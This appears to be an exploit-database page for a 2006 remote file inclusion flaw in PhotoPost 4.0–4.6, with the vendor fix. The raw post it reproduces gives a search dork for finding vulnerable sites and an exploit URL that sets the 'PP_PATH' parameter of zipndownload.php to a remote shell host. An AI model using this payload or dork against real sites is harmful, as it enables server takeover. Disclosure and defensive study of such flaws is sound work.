PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

vendor:

PhotoPost

by:

Saudi Hackrz

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: PhotoPost

Affected Version From: 4.0

Affected Version To: 4.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

PhotoPost 4.6 & 4.5 & 4.x.....4.0 is vulnerable to a remote file inclusion vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'PP_PATH' parameter of the 'zipndownload.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system. The vulnerable code is located in the 'zipndownload.php' script, which includes the 'require' statement with the 'PP_PATH' parameter.

Mitigation:

Update to version 4.7 or 4.8

Source

Exploit-DB raw data:

#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA=============================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net  ,www.xp10.com ,www.lezr.com
==================================I LOVE SAUDI ARABIA=============================================#

# milw0rm.com [2006-09-15]